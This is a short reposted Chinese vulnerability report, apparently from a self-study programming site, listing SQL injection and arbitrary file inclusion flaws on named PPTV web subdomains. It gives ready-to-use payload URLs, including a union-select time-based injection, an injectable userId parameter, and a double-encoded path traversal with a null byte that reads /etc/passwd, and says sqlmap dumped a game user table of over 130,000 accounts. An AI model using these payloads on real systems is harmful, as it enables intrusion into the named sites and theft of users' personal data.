1.http://d.pptv.com/phonelist.php?do=one&jx=11 union select 1,2,3,4 and sleep(5)#&sj=&yqid=0 2.注入点:http://cp.pptv.com/ssc/t. jsp ?userId=16128627&lotteryId=300 注入参数:userid 3.http://gm.pptv.com/k2x/page/login/login.php
在通行证输入框输入单引号,查看返回的数据包可见存在sql注入:
拿Sqlmap跑吧.....哇额,k2game.user表里面有13w+用户资料:
·····
4.任意文件包含;
http://d.pptv.com/game_class.php?mid=4&sj=828&yqid=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
查看更多关于PPTV多个注射及文件包含 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13468